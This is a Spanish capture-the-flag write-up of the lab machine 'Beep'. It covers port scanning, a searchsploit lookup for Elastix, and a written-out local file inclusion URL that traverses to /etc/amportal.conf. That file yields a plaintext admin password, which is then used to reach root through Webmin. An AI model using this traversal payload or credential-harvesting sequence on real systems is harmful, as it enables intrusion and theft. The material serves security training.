# Beep

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 10.10.10.7
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FEtepegfVWdpWVYgRUh5R%2Fimage.png?alt=media&#x26;token=f0c7a3a2-b178-4052-b09d-993d86745668" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sC -sV 10.10.10.7
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FUSqV2frq2kXv6fTVh7FS%2Fimage.png?alt=media&#x26;token=b7da3456-a305-4bf2-87d7-007e6a2f8074" alt=""><figcaption></figcaption></figure>

Durante el escaneo se identificaron los siguientes puertos abiertos:

* **22 (SSH - OpenSSH 4.3)**: Versión antigua, posible explotación y fuerza bruta.
* **25 (SMTP - Postfix)**: Puede filtrar usuarios o permitir envío sin autenticación (open relay).
* **80/443 (HTTP/HTTPS - Apache 2.2.3)**: Versión vulnerable, revisar exploits y probar SQLi, XSS, LFI.
* **110/995 (POP3/POP3s - Cyrus)**: Posible captura de credenciales en texto claro, probar autenticación.
* **111 (RPCBind)**: Puede permitir enumeración y ejecución remota de código.
* **143/993 (IMAP/IMAPs - Cyrus)**: Posible ataque de autenticación o exploits específicos.
* **3306 (MySQL - Acceso no autorizado)**: Intentar acceso con credenciales por defecto.
* **4445 (Servicio desconocido)**: Revisar banners y comportamiento con `nc`.
* **10000 (Webmin - MiniServ 1.570)**: **Vulnerable a RCE**, buscar exploits.

A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.

### 🔎 EXPLORACIÓN

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,25,80,443,110,995,143,993,3306,4445,10000 -v 10.10.10.7
```

para que nos proporcione más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FjA0jRWmLK3dHH3p5XBDE%2Fimage.png?alt=media&#x26;token=49b647f0-d4c7-401d-8bf5-184e9f9bb982" alt=""><figcaption></figcaption></figure>

Miramos el puerto 80.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FeI8V7kR7wLQoNgfWYu0q%2Fimage.png?alt=media&#x26;token=451bea48-e397-4759-91e2-dcfa03e00dd1" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Probamos credenciales por defecto pero no hay resultado. Vamos a ver si **Elastix** tiene alguna vulnerabilidad para explotar.

```bash
searchsploit elastix
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FilraPHmytfAKxOYKDbfU%2Fimage.png?alt=media&#x26;token=79f03d3a-daa0-4965-82fe-5e22cb46acab" alt=""><figcaption></figcaption></figure>

Vemos que tenemos una vulnerabilidad **LFI** por lo que la explotamos. Descargamos el archivo.

```bash
searchsploit -m php/webapps/37637.pl
```

Vemos el contenido.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fsm3Kct6f41WKUY6VQ8bQ%2Fimage.png?alt=media&#x26;token=cab545d4-357e-4963-baef-8434edf0e104" alt=""><figcaption></figcaption></figure>

Observamos el exploit LFI que tiene por lo que es lo que hacemos a continuación.

```bash
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FTqC4KYXhbIyUAOe2uPiG%2Fimage.png?alt=media&#x26;token=41909411-0fee-48dd-bcaa-cff27d8a7250" alt=""><figcaption></figcaption></figure>

Al parecer aparecen unas credenciales.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FJQ4Sia259iRXZnPp7StK%2Fimage.png?alt=media&#x26;token=ceda8d31-0f9f-4532-b1ac-b0e5d7e980ed" alt=""><figcaption></figcaption></figure>

```
admin:jEhdIekWmdjE
```

Nos intentamos loguear con esas credenciales en el servicio **Webmin**.&#x20;

> Nota: las credenciales son root como usuario y misma contraseña.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FLZCxkGemnQWfyYbELNKD%2Fimage.png?alt=media&#x26;token=1dfa7e2f-4a47-44b9-991e-3f80bbbbee8c" alt=""><figcaption></figcaption></figure>

Podemos ejecutar una tarea como root y eso hacemos para una Reverse Shell.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FWdVlhfub3KoOKYWu4Vk1%2Fimage.png?alt=media&#x26;token=ad81d551-81d0-4793-b73f-1f4853a4c16e" alt=""><figcaption></figcaption></figure>

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FmlGspcDaGnFB3uIABleV%2Fimage.png?alt=media&#x26;token=6ab0f660-f642-42e4-8033-9af2565bcd98" alt=""><figcaption></figcaption></figure>

Ya somos **root**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FJK6jy4K4b07CqVEmoIJF%2Fimage.png?alt=media&#x26;token=99cdf0a2-9d7d-4752-93d0-724b036d67c4" alt=""><figcaption></figcaption></figure>